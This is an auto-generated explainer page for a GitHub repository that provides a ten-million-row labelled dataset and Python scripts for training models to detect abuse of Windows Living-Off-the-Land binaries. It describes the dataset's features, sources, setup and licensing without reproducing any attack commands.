explaingit

daniyyell-dev/winlolbin-gt-dataset

Analysis updated 2026-05-18

2PythonAudience · researcherComplexity · 3/5LicenseSetup · moderate

TLDR

A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.

Mindmap

mindmap
  root((repo))
    What it does
      Labelled event dataset
      Benign vs malicious
      ML training data
    Dataset Contents
      10 million events
      55 behavior features
      MITRE ATT&CK labels
    Scripts
      generate dataset
      extract features
      build artifacts
    Data Sources
      LOLBAS catalog
      Atomic Red Team
      MITRE ATT&CK
Click or tap to explore — scroll the page freely

Code map

Detail Auto

An interactive map of this repo's files and how they connect — its source is parsed live in your browser. Click Visualize to build it.

filefunction / class

What do people build with it?

USE CASE 1

Train a machine learning model to detect Windows LOLBIN abuse using the pre-built labelled dataset from Zenodo

USE CASE 2

Reproduce the full ten-million-row dataset from scratch using the generation scripts and verify the labelling methodology

USE CASE 3

Use the 55 extracted behavioral features as a starting point for a SIEM detection rule or anomaly model

USE CASE 4

Benchmark a new detection model on unseen LOLBin attack scenarios not present in the training data

What is it built with?

Python

How does it compare?

daniyyell-dev/winlolbin-gt-dataset0-bingwu-0/live-interpreter0xkaz/llm-governance-dashboard
Stars222
LanguagePythonPythonPython
Setup difficultymoderatemoderatehard
Complexity3/52/54/5
Audienceresearchergeneralops devops

Figures from each repo's GitHub metadata at analysis time.

How do you get it running?

Difficulty · moderate Time to first run · 30min

Dataset files are on Zenodo, not in this repo, generating from scratch also requires the LOLBAS catalog and libLOL command library.

Scripts are MIT licensed, the dataset files on Zenodo are Creative Commons BY 4.0, which requires attribution when used.

In plain English

WinLOLBIN-GT is a labelled dataset created for training machine learning models to detect a specific type of attack on Windows computers. The attack technique is called Living Off the Land, which means an attacker uses built-in Windows tools that already come with the operating system to carry out malicious actions rather than installing separate malware. Because these are legitimate system tools, they are harder for traditional security software to flag. The dataset contains ten million labelled events: five million that represent normal administrative use of these Windows tools, and five million that represent malicious use patterns drawn from known attack procedures. Each event looks like a realistic process execution record, including the command line used, the parent process, file paths, user context, and a MITRE ATT&CK technique identifier that labels the attack category. A model trained on this dataset was tested on attack scenarios it had never seen and achieved 99 percent accuracy. The repository contains four Python scripts. The first generates the raw ten-million-row dataset by simulating events from the LOLBAS catalog, a public list of Windows binaries that attackers commonly abuse, and Red Canary's Atomic Red Team attack procedures. The second script processes the raw data, extracts 55 behavioral features per event, and removes fields that would leak ground-truth labels into model training. The finished dataset is hosted separately on Zenodo and is not stored in this repository. The generation scripts are licensed under MIT. The dataset files on Zenodo are released under Creative Commons BY 4.0, which requires attribution when you use them.

Copy-paste prompts

Prompt 1
I want to train a binary classifier to detect Windows LOLBIN abuse using WinLOLBIN-GT. Walk me through downloading the dataset from Zenodo, what the 55 features represent, and a basic scikit-learn setup.
Prompt 2
How do I run generate_winlolbin_gt_dataset.py to produce the raw 10-million-row dataset, and what source files do I need before running it?
Prompt 3
What is the model_text field in WinLOLBIN-GT and how should I use it when fine-tuning a text-based classifier?
Prompt 4
I want to extend WinLOLBIN-GT with new LOLBin techniques. How do I add new malicious command patterns without introducing duplicates?

Frequently asked questions

What is winlolbin-gt-dataset?

A ten-million-row labelled dataset and Python scripts for training ML models to detect Windows Living-Off-the-Land binary abuse, split evenly between benign and malicious process events.

What language is winlolbin-gt-dataset written in?

Mainly Python. The stack also includes Python.

What license does winlolbin-gt-dataset use?

Scripts are MIT licensed, the dataset files on Zenodo are Creative Commons BY 4.0, which requires attribution when used.

How hard is winlolbin-gt-dataset to set up?

Setup difficulty is rated moderate, with roughly 30min to a first successful run.

Who is winlolbin-gt-dataset for?

Mainly researcher.

Open on GitHub → Explain another repo

This repo across BitVibe Labs

Scan in gitsafehub Deploy in gitdeployhub daniyyell-dev on gitmyhub

Verify against the repo before relying on details.